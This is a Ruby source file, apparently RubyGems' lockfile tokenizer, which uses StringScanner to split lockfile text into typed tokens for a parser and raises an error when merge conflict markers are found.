Current File : /opt/alt/ruby32/share/rubygems/rubygems/request_set/lockfile/tokenizer.rb
# frozen_string_literal: true

require_relative "parser"

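##
# Tokenizer for RubyGems lockfiles.  It splits lockfile text into Token
# structs which Gem::RequestSet::Lockfile::Parser consumes to rebuild the
# locked dependency set.
#
# A minimal usage sketch (the lockfile path is illustrative):
#
#   tokenizer = Gem::RequestSet::Lockfile::Tokenizer.from_file "gem.deps.rb.lock"
#   tokenizer.to_a.first # => e.g. [:section, "GEM", 0, 0]
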
class Gem::RequestSet::Lockfile::Tokenizer
  Token = Struct.new :type, :value, :column, :line
  EOF   = Token.new :EOF

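  ##
  # Creates a Tokenizer for the contents of +file+, recording the path so it
  # can appear in parse error messages.
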
  def self.from_file(file)
    new File.read(file), file
  end

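  ##
  # Creates a new Tokenizer for +input+ and tokenizes it immediately.
  # +filename+ is reported in errors, while +line+ and +pos+ seed the line
  # and byte-offset tracking used to compute token positions.
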
  def initialize(input, filename = nil, line = 0, pos = 0)
    @line     = line
    @line_pos = pos
    @tokens   = []
    @filename = filename
    tokenize input
  end

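  ##
  # Builds a Gem::RequestSet::Lockfile::Parser that consumes this
  # tokenizer's tokens for the given +set+ and +platforms+.
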
  def make_parser(set, platforms)
    Gem::RequestSet::Lockfile::Parser.new self, set, platforms, @filename
  end

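  ##
  # Returns the tokens as [type, value, column, line] arrays.
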
  def to_a
    @tokens.map {|token| [token.type, token.value, token.column, token.line] }
  end

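  ##
  # Removes tokens from the front of the queue while their type matches
  # +type+.
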
  def skip(type)
    @tokens.shift while !@tokens.empty? && peek.type == type
  end

  ##
  # Calculates the column (by byte) and the line of the current token based on
  # +byte_offset+.

  def token_pos(byte_offset) # :nodoc:
    [byte_offset - @line_pos, @line]
  end

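  ##
  # True when no tokens remain.
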
  def empty?
    @tokens.empty?
  end

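  ##
  # Pushes +token+ back onto the front of the queue.
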
  def unshift(token)
    @tokens.unshift token
  end

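  ##
  # Removes and returns the next token.  Returns nil when no tokens remain.
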
  def next_token
    @tokens.shift
  end
  alias :shift :next_token

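  ##
  # Returns the next token without removing it, or EOF when the token queue
  # is empty.
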
  def peek
    @tokens.first || EOF
  end

  private

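  ##
  # Scans +input+ with StringScanner and fills @tokens with :newline,
  # :section, :entry, :l_paren, :r_paren, :requirement, :comma, :bang and
  # :text tokens.  Raises Gem::RequestSet::Lockfile::ParseError when merge
  # conflict markers are found.
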
  def tokenize(input)
    require "strscan"
    s = StringScanner.new input

    until s.eos? do
      pos = s.pos

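      # Skip any leading spaces, but remember that they were present: an
      # indented run of capital letters below is treated as plain text
      # rather than a section header.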
      pos = s.pos if leading_whitespace = s.scan(/ +/)

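      # Seven consecutive characters drawn from <, |, = or > indicate
      # unresolved merge conflict markers left in the lockfile.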
      if s.scan(/[<|=>]{7}/)
        message = "your #{@filename} contains merge conflict markers"
        column, line = token_pos pos

        raise Gem::RequestSet::Lockfile::ParseError.new message, column, line, @filename
      end

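      # The case expression below evaluates to exactly one token per
      # iteration, which is appended to @tokens.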
      @tokens <<
        case
        when s.scan(/\r?\n/) then
          token = Token.new(:newline, nil, *token_pos(pos))
          @line_pos = s.pos
          @line += 1
          token
        when s.scan(/[A-Z]+/) then
          if leading_whitespace
            text = s.matched
            text += s.scan(/[^\s)]*/).to_s # in case of no match
            Token.new(:text, text, *token_pos(pos))
          else
            Token.new(:section, s.matched, *token_pos(pos))
          end
        when s.scan(/([a-z]+):\s/) then
          s.pos -= 1 # rewind for possible newline
          Token.new(:entry, s[1], *token_pos(pos))
        when s.scan(/\(/) then
          Token.new(:l_paren, nil, *token_pos(pos))
        when s.scan(/\)/) then
          Token.new(:r_paren, nil, *token_pos(pos))
        when s.scan(/<=|>=|=|~>|<|>|!=/) then
          Token.new(:requirement, s.matched, *token_pos(pos))
        when s.scan(/,/) then
          Token.new(:comma, nil, *token_pos(pos))
        when s.scan(/!/) then
          Token.new(:bang, nil, *token_pos(pos))
        when s.scan(/[^\s),!]*/) then
          Token.new(:text, s.matched, *token_pos(pos))
        else
          raise "BUG: can't create token for: #{s.string[s.pos..-1].inspect}"
        end
    end

    @tokens
  end
end
